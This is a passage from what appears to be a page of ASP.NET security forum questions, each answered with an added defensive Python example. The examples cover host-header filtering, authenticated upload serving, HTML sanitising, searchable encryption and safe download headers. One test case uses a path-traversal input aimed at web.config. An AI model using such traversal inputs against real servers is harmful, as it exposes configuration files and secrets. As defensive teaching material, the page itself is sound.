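    return host.lower() in allowed


def classify_errors(lines, allowed=ALLOWED_HOSTS):
    """Return (own, foreign) Counters of hits per host from the mailer's one-line summaries."""
    own, foreign = Counter(), Counter()
    for line in lines:
        m = ERROR_RE.search(line)
        if not m:
            continue
        host = (urlsplit(m["url"]).hostname or "").lower()
        (own if host in allowed else foreign)[host] += 1
    return own, foreign


def should_process(host_header, allowed=ALLOWED_HOSTS):
    """Front-door rule: only requests for a known host name reach the application.

    The durable fix is an explicit host-name binding in IIS (then unbound names never
    arrive); this function is the same check applied in code, e.g. at BeginRequest.
    """
    return (host_header or "").split(":")[0].lower() in allowed


# First three lines are from the post; the last is constructed to show an own-domain hit.
SAMPLE_LOG = [
    "Error in page https://www.themav.com/store/ShoppingCart.aspx - Message The file '/store/ShoppingCart.aspx' does not exist. Trace",
    "Error in page https://www.themav.com/cart/d6fe3be2c41a1bc2.aspx - Message The file '/cart/d6fe3be2c41a1bc2.aspx' does not exist. Trace",
    "Error in page https://mail.ncbels.org/owa/auth/logon.aspx - Message The file '/owa/auth/logon.aspx' does not exist. Trace",
    "Error in page https://www.example.org/missing.aspx - Message The file '/missing.aspx' does not exist. Trace",
]
```

The paths themselves (OWA logon, ShoppingCart.aspx under several folders, hex-named .aspx files) are the fingerprint of a crawler that was pointed at the other domains' content and followed their links to whichever IP answered; once the binding is host-specific these requests get IIS's own 404 and never generate an application error.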

Strange IP Addresses and Service Providers


In my analytics, I'm seeing hits to my websites.

Many of them are government IP addresses such as the DOD (Department of Defense)

I also have this information that I don't understand

[ipv4 address block not managed by the ripe ncc]

What is this?  Should I be concerned?  

System.Security.SecurityException when setting .NET Trust Level to High


Hello,

I am getting System.Security.SecurityException when setting the .NET Trust Level to High in IIS (version 8.0); please refer to the screenshot below for further error details. I am using .NET Framework 4.0.

Web Application is working fine in Full .NET Trust Level

The error below only appears on the pages where I am using the third-party control ABCpdf and our custom-developed component to generate dynamic reports.

Please suggest.

URI Format not supported.The remote server returned an error: (401) Unauthorized.


Hi,

I want to download the document from the URL mentioned below. When I try to download it directly from the IE address bar, it asks for username and password credentials to open the document.

But when I try to download it through the application I get the error below.

"The remote server returned an error: (401) Unauthorized."

ASP.NET Code:

Imports System.Net
Imports System.Text

' downloadbutton_click event
Dim URIFile As String = "http://sr1250kl.vrmnet.vrm.intranet/A1/servlet/Download?auth=basic&event_name=k1_view&_file=emparea&id=0000008763&version=01"

Dim client As New WebClient()
' The last assignment to Credentials wins, so setting DefaultCredentials and
' UseDefaultCredentials first had no effect; only the explicit account is sent.
client.Credentials = New NetworkCredential("XXXXXX", "XXXXXXX", "vrmnet.vrm.intranet")
Dim buffer As Byte() = client.DownloadData(URIFile)
' The payload is a binary PDF; decoding it as ASCII text is only useful for debugging
Dim download As String = Encoding.ASCII.GetString(buffer)
Console.WriteLine(download)
Console.WriteLine("Download successful.")
Response.ContentType = "application/pdf"
Response.AddHeader("content-length", buffer.Length.ToString())
Response.BinaryWrite(buffer)

The above code is not working when I click the download button. Error: "The remote server returned an error: (401) Unauthorized."

How do I download the file?

Remove Server information from HTTP header response?


How do I remove the Server information from the HTTP header programmatically? I don't want to use UrlScan or any other tool.

In the Global.asax file, in the Application_PreSendRequestHeaders event, I have the code below:

Response.Headers.Remove("Server");

And I tried the same thing in a custom HttpHandler also, but somehow it doesn't remove the Server information.

How do I fix this problem? From where else is the Server information being pushed into the HTTP response?


Deny access to upload folder to unauthorized user to access files in upload folder


Hi,

I have an upload folder for uploading documents.

But if a user knows the URL of a document, he is able to access it without logging in to the web application.

Is it possible to deny the user access to it?

Note: there is no information maintained in the database, so I cannot restrict them from the database.
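Both upload-folder questions on this page (the NTFS permissions one above and this direct-URL one) have the same shape of answer. On the file system, the account that writes uploads is the web application's worker identity (in IIS 7 and later the application pool identity, `IIS AppPool\<pool name>`, or whatever account the pool runs as, unless the application impersonates the caller), so that identity plus the server administrators is the whole ACL; 'Everyone' can go. For the URL problem, keep the folder outside the web root (or deny anonymous access to it in web.config) and serve files only through a handler that checks the session and decides who may read which file, so a guessed URL returns nothing. The code below is an added example, not either poster's code: a download handler with a stand-in session and a stand-in owner lookup (both assumptions), exercised on a constructed temporary folder.

```python
"""Serve uploads through an authenticated handler instead of as static files (added example).

Session dictionaries and the owner lookup are stand-ins; the upload folder is constructed.
"""
import tempfile
from pathlib import Path


class Forbidden(Exception):
    pass


class NotFound(Exception):
    pass


def resolve_upload(upload_root, requested_name):
    """Map a user-supplied name to a path strictly inside upload_root."""
    root = Path(upload_root).resolve()
    # Keep only the final path component: removes '../', absolute paths and drive letters.
    candidate = (root / Path(requested_name).name).resolve()
    if candidate.parent != root:
        raise Forbidden("path escapes upload root")
    if not candidate.is_file():
        raise NotFound(requested_name)
    return candidate


def serve_upload(session, upload_root, requested_name, owner_of):
    """Authorise first, then return (content_type, bytes); owner_of(name) -> uploader is assumed."""
    user = session.get("user")
    if user is None:
        raise Forbidden("login required")          # a bare URL with no session gets nothing
    path = resolve_upload(upload_root, requested_name)
    if owner_of(path.name) != user and not session.get("is_admin"):
        raise Forbidden("not your document")
    # Fixed content type and (in the real handler) Content-Disposition: attachment,
    # so an uploaded HTML file is never rendered in the site's origin.
    return "application/octet-stream", path.read_bytes()


def demo():
    """Constructed scenario: one uploaded file, five different callers."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "contract.pdf").write_bytes(b"%PDF-1.4 constructed")
        owner = lambda name: {"contract.pdf": "alice"}.get(name)
        cases = [
            ({"user": "alice"}, "contract.pdf"),
            ({}, "contract.pdf"),
            ({"user": "bob"}, "contract.pdf"),
            ({"user": "alice"}, "../web.config"),
            ({"user": "alice"}, "."),
            ({"user": "admin", "is_admin": True}, "contract.pdf"),
        ]
        results = {}
        for session, name in cases:
            key = (session.get("user"), name)
            try:
                results[key] = serve_upload(session, root, name, owner)[1][:4]
            except Forbidden as e:
                results[key] = f"forbidden: {e}"
            except NotFound:
                results[key] = "not found"
        return results
```

The "no information in the database" constraint only matters for the per-file ownership check; the login check alone already defeats the guessed-URL case, and ownership can be derived from a per-user sub-folder name if nothing else is recorded.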

Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment is not removing img tag


Hello,

I need GetSafeHtmlFragment to remove the img tag too, but it is not removing it.

Does anyone have an idea how to remove the img tag? Is there a whitelist or blacklist?

Can we make our own custom blacklist for tags?
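GetSafeHtmlFragment works from a fixed allow-list inside the AntiXSS library, and img is on it, which is why the tag survives; there is no configurable blacklist to add it to. The shape that does what the question asks is an allow-list sanitizer of your own: decide which tags and attributes are permitted, drop every other tag (img included), and strip attributes and URL schemes that carry script. The parser below is an added example, not the AntiXSS library's code and not the poster's; its tag and attribute sets are assumptions, and the fragments it is exercised on are constructed.

```python
"""Allow-list HTML sanitizer (added example, not the AntiXSS library's code).

Keeps a small set of formatting tags, drops every other tag including img, discards
script/style content, and strips attributes and URL schemes that can carry script.
ALLOWED_TAGS / ALLOWED_ATTRS are assumptions for the post's use case.
"""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "b", "i", "strong", "em", "ul", "ol", "li", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID = {"br"}
DROP_CONTENT = {"script", "style"}          # tag and its text both disappear
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:", "/")


class AllowListSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []      # tag names removed, for logging
        self._skip = None      # tag whose content is being discarded

    def handle_starttag(self, tag, attrs):
        if self._skip:
            return
        if tag in DROP_CONTENT:
            self._skip = tag
            self.dropped.append(tag)
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)       # tag removed; its inner text is kept
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue                   # onerror=, style=, class=, ... never pass
            v = value.strip()
            if name == "href" and not v.lower().startswith(SAFE_URL_PREFIXES):
                continue                   # javascript:, data:, vbscript: ...
            kept.append(f' {name}="{escape(v, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self._skip:
            if tag == self._skip:
                self._skip = None
            return
        if tag in ALLOWED_TAGS and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._skip:
            return
        self.out.append(escape(data))     # re-encode text so it cannot re-open a tag


def sanitize(fragment):
    """Return (clean_html, dropped_tag_names)."""
    s = AllowListSanitizer()
    s.feed(fragment)
    s.close()
    return "".join(s.out), s.dropped
```

If you stay with GetSafeHtmlFragment, the pragmatic alternative is to run its output through a second pass that removes the few tags you additionally object to; a true blacklist of your own is the wrong direction, because every tag you forget stays allowed.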

How to run security checks on your mvc .net website


How do you run security checks on your MVC .NET website to check for possible hacking loopholes?

Search for a word in encrypted text


I use TripleDES and Cryptography in C# to encrypt my text and then save it in a database. Now I want to be able to search for a single word in that encrypted text in the database. I thought that if I encrypt the word I want to search on, I could use that encrypted word to search in my database (SQL Server with FREETEXT). But the encrypted string of the word doesn't appear at all in the entire encrypted text.

How can I achieve what I want, namely: a user types in a word he wants to look for and my database returns the found record? Encryption must remain in .NET though. I don't know how to create the identical encryption on the database side.
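The observation in the post is the expected behaviour: with a block cipher used properly (random IV, CBC chaining) the ciphertext of a word depends on its position and on everything before it, so the encrypted word never appears as a substring, and FREETEXT over the ciphertext column cannot work. The standard way to keep the data encrypted and still search it is a blind index: alongside the ciphertext, store a keyed hash (HMAC) of each normalised word under a separate index key, and look up the HMAC of the query word. The example below is added, not the poster's code; the encryption column is a stand-in for the real .NET TripleDES value, and the index key, tokenizer and truncation length are assumptions.

```python
"""Searchable encryption via a per-word blind index (added example, not the post's code).

The ciphertext column is a stand-in for the .NET TripleDES value; only the index
side is shown. INDEX_KEY must be a different secret from the encryption key.
"""
import hashlib
import hmac
import os
import re

INDEX_KEY = os.urandom(32)          # assumption: kept with the .NET app, next to the 3DES key
WORD_RE = re.compile(r"[a-z0-9]+")


def tokens(text):
    """Normalise to lower-case alphanumeric words; the same function runs at index and query time."""
    return set(WORD_RE.findall(text.lower()))


def blind_token(word, key=INDEX_KEY):
    # Truncated to 16 bytes of hex: still collision-free in practice, cheaper to store and index.
    return hmac.new(key, word.lower().encode("utf-8"), hashlib.sha256).hexdigest()[:32]


def index_for(plaintext, key=INDEX_KEY):
    return {blind_token(w, key) for w in tokens(plaintext)}


class EncryptedTable:
    """Rows of (id, opaque ciphertext, set of blind tokens); search touches only the tokens."""

    def __init__(self, key=INDEX_KEY):
        self.rows = []
        self.key = key

    def insert(self, row_id, plaintext):
        # Stand-in for the TripleDES ciphertext: opaque, randomised, useless for matching.
        opaque = hashlib.sha256(os.urandom(8) + plaintext.encode()).hexdigest()
        self.rows.append((row_id, opaque, index_for(plaintext, self.key)))

    def search(self, word):
        """Equality search on one word: hash the query the same way and compare tokens."""
        t = blind_token(word, self.key)
        return [row_id for row_id, _ciphertext, idx in self.rows if t in idx]
```

In SQL Server the token set becomes a child table (RecordId, Token) with an index on Token; the WHERE clause compares against the single HMAC the .NET side computed for the query, so the database never sees the key or the plaintext. The trade-offs are that only whole-word equality is possible (no prefix or FREETEXT ranking) and that the index leaks which rows share words, which is why the key is separate from the encryption key and the tokens are not derived from the ciphertext.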

Header Manipulation

using System;
using System.Data;
using System.IO;
using System.Web.UI;
using System.Web.UI.WebControls;

protected void exportToExcelGv(object sender, EventArgs e)
{
    string FileName = "\\" + System.Configuration.ConfigurationManager.AppSettings["DocuDir"] + "\\FXExposure_" + ddlFund.SelectedValue + ".xls";
    string FilePath = Server.MapPath("FXExpsure.aspx");
    string newPath = Path.GetDirectoryName(FilePath) + FileName;
    GridView excel = new GridView();

    DataTable dt = (DataTable)Session["dtExcel"];
    // "Fund" already exists when the table was exported earlier in this session
    if (!dt.Columns.Contains("Fund"))
    {
        dt.Columns.Add("Fund").SetOrdinal(0);
    }

    for (int i = 0; i < dt.Rows.Count; i++)
    {
        if (ddlFund.SelectedValue == "All Funds")
        {
            dt.Rows[i]["Fund"] = "All Funds";
        }
        else
        {
            dt.Rows[i]["Fund"] = Session["FundName"];
        }
    }

    using (StreamWriter sw = new StreamWriter(newPath))
    using (HtmlTextWriter hw = new HtmlTextWriter(sw))
    {
        excel.DataSource = dt;
        excel.DataBind();
        excel.RenderControl(hw);
    }

    Response.ContentType = "application/vnd.ms-excel";   // the original assigned ContentType to itself
    // Fortify flags the next line: ddlFund.SelectedValue (request data) flows into a response header
    Response.AppendHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(FileName));
    Response.WriteFile(newPath);
    Response.End();
}

After using Fortify to analyze my code, Fortify identifies this line of code:

Response.AppendHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(FileName));

as having a 'header manipulation' vulnerability.

Can anyone help me resolve the issue i'm currently facing? 

Thank you so much!
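Fortify traces ddlFund.SelectedValue, which arrives in the POST body and can be anything the client chooses regardless of what the drop-down offered, into the Content-Disposition header; a value containing CR/LF would end the header and let the client append headers of its own. ASP.NET's header checking (httpRuntime enableHeaderChecking, on by default) already encodes newlines in header values, but the finding is cleared, and quotes and non-ASCII fund names handled at the same time, by building the file name from an allow-list rather than from the raw value. The code below is an added example, not the poster's C# code; the prefix, extension and character allow-list are assumptions matching the file name pattern in the post.

```python
"""Building a Content-Disposition header from user-influenced input (added example).

Not the post's C# code; prefix/extension/allow-list are assumptions.
"""
import re
from urllib.parse import quote

SAFE_NAME = re.compile(r"[^A-Za-z0-9._-]+")


def safe_filename(user_part, prefix="FXExposure_", ext=".xls", max_len=80):
    """Reduce user input to a fixed-shape, printable file-name component."""
    cleaned = SAFE_NAME.sub("_", user_part).strip("._")   # CR, LF, quotes, ';' all become '_'
    if not cleaned:
        cleaned = "export"
    return f"{prefix}{cleaned[:max_len]}{ext}"


def content_disposition(filename):
    """RFC 6266 attachment header: quoted ASCII fallback plus RFC 5987 filename* when needed."""
    if any(ord(c) < 32 or c == "\x7f" for c in filename):
        raise ValueError("control character in file name")   # defence in depth; safe_filename never produces one
    ascii_fallback = filename.encode("ascii", "replace").decode().replace('"', "_").replace("\\", "_")
    header = f'attachment; filename="{ascii_fallback}"'
    if not filename.isascii():
        header += f"; filename*=UTF-8''{quote(filename, safe='')}"
    return header


def header_line(user_part):
    """What the export handler would append instead of concatenating the raw drop-down value."""
    return content_disposition(safe_filename(user_part))
```

The equivalent in the C# handler is to validate ddlFund.SelectedValue against the list the drop-down was bound from (or against the same character allow-list) before it is used in either the file path or the header; the path use is the more serious of the two, because the raw value also decides where on disk the export is written.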


